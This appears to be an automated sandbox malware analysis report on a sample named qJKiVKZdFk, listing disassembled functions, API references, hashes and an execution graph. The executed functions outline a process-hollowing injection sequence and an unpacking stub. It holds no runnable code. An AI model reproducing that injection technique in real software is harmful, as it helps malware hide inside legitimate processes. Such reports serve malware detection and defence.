                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DF2670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: D
                                                                                                                                        • API String ID: 2102423945-2746444292
                                                                                                                                        • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                        • Instruction ID: 903447c62e365962114c64be5f424243c21a21d6cb7906850a4327d6e2cf3d0b
                                                                                                                                        • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                        • Instruction Fuzzy Hash: 81E15D75D40219EBCF24DBA0DD49FEEB7B8BF04304F14406AE609B6190EB74AA85CF54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DED8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: $$$(
                                                                                                                                        • API String ID: 2102423945-3551151888
                                                                                                                                        • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                        • Instruction ID: 536adda3835efb141411ff40181541e98132b68629be5dea671f42aa96cbae39
                                                                                                                                        • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                        • Instruction Fuzzy Hash: E491BF71D00218EBEF21EFA0CC59BEEBBB5AF05304F14416AD515772C0DBB65A88CB65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E05CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcsnlen
                                                                                                                                        • String ID: U
                                                                                                                                        • API String ID: 3628947076-3372436214
                                                                                                                                        • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                        • Instruction ID: 65391dee831598a6a9cfb4ee61194874d576428b9291e4020b938fb4747b8e77
                                                                                                                                        • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                        • Instruction Fuzzy Hash: 7021F6722082087AEB009BA49C49BBA739DEB44660F503167E989C61D0FB71ED814E94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DFA810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: p2Q
                                                                                                                                        • API String ID: 2102423945-1521255505
                                                                                                                                        • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                        • Instruction ID: 08b067ffaf8f842dfb2eb39190dd65c6b6be97f1aa309e85500c3bcb7a925abf
                                                                                                                                        • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                        • Instruction Fuzzy Hash: 61F0ED78698751A5F7217750BC2AB897E917B31B08F105088E1582E2E1D3FD238DA79A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E2FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::exception::exception.LIBCMT ref: 05E2FBF1
                                                                                                                                          • Part of subcall function 05E1169C: std::exception::_Copy_str.LIBCMT ref: 05E116B5
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E2FC06
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                                                                                                                        • String ID: TeM$TeM
                                                                                                                                        • API String ID: 3662862379-3870166017
                                                                                                                                        • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                        • Instruction ID: 6c37015a6bd94fc20c2d192dd6d2c7548c98d6958e8416df91fd2f4f41ebc1c6
                                                                                                                                        • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                        • Instruction Fuzzy Hash: 83D06775D0020CBBCB04EFA5D459CDDBBB8AA04344B00C466AE5597245EA74A349CB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DED0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 05E0197D: __wfsopen.LIBCMT ref: 05E01988
                                                                                                                                        • _fgetws.LIBCMT ref: 05DED15C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wfsopen_fgetws
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 853134316-0
                                                                                                                                        • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                        • Instruction ID: b5d300ffe4ee1e9d8c7f78ec1ae3ee1ab83168f0cfc790b9bff96a8d2c818e13
                                                                                                                                        • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                        • Instruction Fuzzy Hash: 8A918271D00319ABCF21FFA4CD45BAEB7F6BF04214F14052ED855A7280EB75AA44CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DED540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1783060780-0
                                                                                                                                        • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                        • Instruction ID: 27f813a24b3dd596555698c3446bb58e5d0b6c93ca4c831612e857206e0c52a0
                                                                                                                                        • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                        • Instruction Fuzzy Hash: 59A18DB1D00248EBEF11EFA4CC4EBDEBBB1AF14304F141029D5457B291D7B65A88CBA6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E02AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                        • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                        • Instruction ID: f2928f2b1461af0d35573f71a130fda99844362f15613ddcb0539e7176c3c98a
                                                                                                                                        • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                        • Instruction Fuzzy Hash: F451A538A042059BEB259F69C88C5AE77E6BF40334F14B329EAB5962D0D77099D18F40
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E21359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                        • Instruction ID: a0065a62e00489f1dc372492aa6632e6e00c225caede3f3c6eda3b7e3c8223b2
                                                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                        • Instruction Fuzzy Hash: 68017B3280415EFBCF1A5F84CC05CEE3F63BB18244B0A9414FA9958838D232C6B2EB81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05EA7A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 05EA7A4B
                                                                                                                                          • Part of subcall function 05EA8140: ___BuildCatchObjectHelper.LIBCMT ref: 05EA8172
                                                                                                                                          • Part of subcall function 05EA8140: ___AdjustPointer.LIBCMT ref: 05EA8189
                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 05EA7A62
                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 05EA7A74
                                                                                                                                        • CallCatchBlock.LIBCMT ref: 05EA7A98
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                        • Instruction ID: a758289b5e2beaf28ff1a68e78f031145c8190463bc1db556c3af24cfbe33e02
                                                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                        • Instruction Fuzzy Hash: 5601D733500109BBDF12AF65CC04EDA7BAAFF49758F159014F99969120D732E961DBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:1.1%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:38
                                                                                                                                        Total number of Limit Nodes:8
                                                                                                                                        execution_graph 33557 5dc0000 33560 5dc0630 33557->33560 33559 5dc0005 33561 5dc064c 33560->33561 33563 5dc1577 33561->33563 33566 5dc05b0 33563->33566 33570 5dc05dc 33566->33570 33567 5dc061e 33568 5dc05e2 GetFileAttributesA 33568->33570 33570->33567 33570->33568 33571 5dc0420 33570->33571 33572 5dc04f3 33571->33572 33573 5dc04ff CreateWindowExA 33572->33573 33574 5dc04fa 33572->33574 33573->33574 33575 5dc0540 PostMessageA 33573->33575 33574->33570 33576 5dc055f 33575->33576 33576->33574 33578 5dc0110 VirtualAlloc GetModuleFileNameA 33576->33578 33579 5dc017d CreateProcessA 33578->33579 33580 5dc0414 33578->33580 33579->33580 33582 5dc025f VirtualFree VirtualAlloc Wow64GetThreadContext 33579->33582 33580->33576 33582->33580 33583 5dc02a9 ReadProcessMemory 33582->33583 33584 5dc02e5 VirtualAllocEx NtWriteVirtualMemory 33583->33584 33585 5dc02d5 NtUnmapViewOfSection 33583->33585 33586 5dc033b 33584->33586 33585->33584 33587 5dc039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33586->33587 33588 5dc0350 NtWriteVirtualMemory 33586->33588 33589 5dc03fb ExitProcess 33587->33589 33588->33586 33591 4488026 33592 4488035 33591->33592 33595 44887c6 33592->33595 33597 44887e1 33595->33597 33596 44887ea CreateToolhelp32Snapshot 33596->33597 33598 4488806 Module32First 33596->33598 33597->33596 33597->33598 33599 4488815 33598->33599 33601 448803e 33598->33601 33602 4488485 33599->33602 33603 44884b0 33602->33603 33604 44884f9 33603->33604 33605 44884c1 VirtualAlloc 33603->33605 33604->33604 33605->33604

                                                                                                                                        Executed Functions

                                                                                                                                        Function 05DC0110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 05DC0156
                                                                                                                                        • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 05DC016C
                                                                                                                                        • CreateProcessA.KERNELBASE(?,00000000), ref: 05DC0255
                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 05DC0270
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 05DC0283
                                                                                                                                        • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 05DC029F
                                                                                                                                        • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DC02C8
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 05DC02E3
                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 05DC0304
                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 05DC032A
                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 05DC0399
                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DC03BF
                                                                                                                                        • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 05DC03E1
                                                                                                                                        • ResumeThread.KERNELBASE(00000000), ref: 05DC03ED
                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 05DC0412
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 93872480-0
                                                                                                                                        • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                        • Instruction ID: 567f29c3326dd9cc2eb87b9c2dfdb7929acbbb719e2a9827baf16f8c4cfccdff
                                                                                                                                        • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                        • Instruction Fuzzy Hash: F2B1B674A00209EFDB44CF98C895FAEBBB5BF88314F248158E549AB391D771AE41CF94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 15 5dc0420-5dc04f8 17 5dc04ff-5dc053c CreateWindowExA 15->17 18 5dc04fa 15->18 20 5dc053e 17->20 21 5dc0540-5dc0558 PostMessageA 17->21 19 5dc05aa-5dc05ad 18->19 20->19 22 5dc055f-5dc0563 21->22 22->19 23 5dc0565-5dc0579 22->23 23->19 25 5dc057b-5dc0582 23->25 26 5dc05a8 25->26 27 5dc0584-5dc0588 25->27 26->22 27->26 28 5dc058a-5dc0591 27->28 28->26 29 5dc0593-5dc0597 call 5dc0110 28->29 31 5dc059c-5dc05a5 29->31 31->26
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 05DC0533
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateWindow
                                                                                                                                        • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                        • API String ID: 716092398-2341455598
                                                                                                                                        • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                        • Instruction ID: 868ab8c69b83ebaab8802383638fd404aa9087d934ef5b0d9ffb16802cc2bdc5
                                                                                                                                        • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                        • Instruction Fuzzy Hash: 44511770D08389DBEB11CBA8C849BEDBFB2AF11708F14409DD5446F2C6C3BA5659CB62
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 32 5dc05b0-5dc05d5 33 5dc05dc-5dc05e0 32->33 34 5dc061e-5dc0621 33->34 35 5dc05e2-5dc05f5 GetFileAttributesA 33->35 36 5dc05f7-5dc05fe 35->36 37 5dc0613-5dc061c 35->37 36->37 38 5dc0600-5dc060b call 5dc0420 36->38 37->33 40 5dc0610 38->40 40->37
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNELBASE(apfHQ), ref: 05DC05EC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID: apfHQ$o
                                                                                                                                        • API String ID: 3188754299-2999369273
                                                                                                                                        • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                        • Instruction ID: de1b1fd180672ff418fdc65619583be5798b008c36ae073217b7c4d46e37b5dc
                                                                                                                                        • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                        • Instruction Fuzzy Hash: 9C011E70C0824DEBDB11DF98C5183AEBFB5AF41308F1480DDC4492B241D7769B58CBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 044887C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 41 44887c6-44887df 42 44887e1-44887e3 41->42 43 44887ea-44887f6 CreateToolhelp32Snapshot 42->43 44 44887e5 42->44 45 44887f8-44887fe 43->45 46 4488806-4488813 Module32First 43->46 44->43 45->46 53 4488800-4488804 45->53 47 448881c-4488824 46->47 48 4488815-4488816 call 4488485 46->48 51 448881b 48->51 51->47 53->42 53->46
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 044887EE
                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0448880E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251680142.0000000004488000.00000040.00000020.00020000.00000000.sdmp, Offset: 04488000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_4488000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction ID: 8d9888230c5c63253cb0df516bcc8ade18f812b0c6b23bb0ef8bf661302f4ead
                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction Fuzzy Hash: 23F062366007146BDB207BB5AC8DA6FB6E8AF49765F50052EE642911C0DA70F8454661
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 04488485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 54 4488485-44884bf call 4488798 57 448850d 54->57 58 44884c1-44884f4 VirtualAlloc call 4488512 54->58 57->57 60 44884f9-448850b 58->60 60->57
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 044884D6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251680142.0000000004488000.00000040.00000020.00020000.00000000.sdmp, Offset: 04488000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_4488000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction ID: 58cfd9e79595d6f52a1c31ede926a13ab18745a2b3cfe210fa8081d13c3fa492
                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction Fuzzy Hash: A6113C79A00208EFDB01EF99C985E9DBBF5AF08350F458095F9489B362D375EA90DF80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 05DE6437 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 551 5de6437-5de6440 552 5de6466 551->552 553 5de6442-5de6446 551->553 554 5de6468-5de646b 552->554 553->552 555 5de6448-5de6459 call 5de9636 553->555 558 5de646c-5de647d call 5de9636 555->558 559 5de645b-5de6460 call 5de5ba8 555->559 564 5de647f-5de6480 call 5de158d 558->564 565 5de6488-5de649a call 5de9636 558->565 559->552 568 5de6485-5de6486 564->568 570 5de64ac-5de64cd call 5de5f4c call 5de6837 565->570 571 5de649c-5de64aa call 5de158d * 2 565->571 568->559 580 5de64cf-5de64dd call 5de557d 570->580 581 5de64e2-5de6500 call 5de158d call 5de4edc call 5de4d82 call 5de158d 570->581 571->568 586 5de64df 580->586 587 5de6502-5de6505 580->587 589 5de6507-5de6509 581->589 586->581 587->589 589->554
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1442030790-0
                                                                                                                                        • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                        • Instruction ID: 0c0efad90b571c87086bd74df74d580b4a3dcc3b2f8bff33218a0db348f4a48b
                                                                                                                                        • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                        • Instruction Fuzzy Hash: 3421C331308601AEEB227F65EC09E1F7BE5EF52760B90842BF586550A0EA32C551CB71
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DE3F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
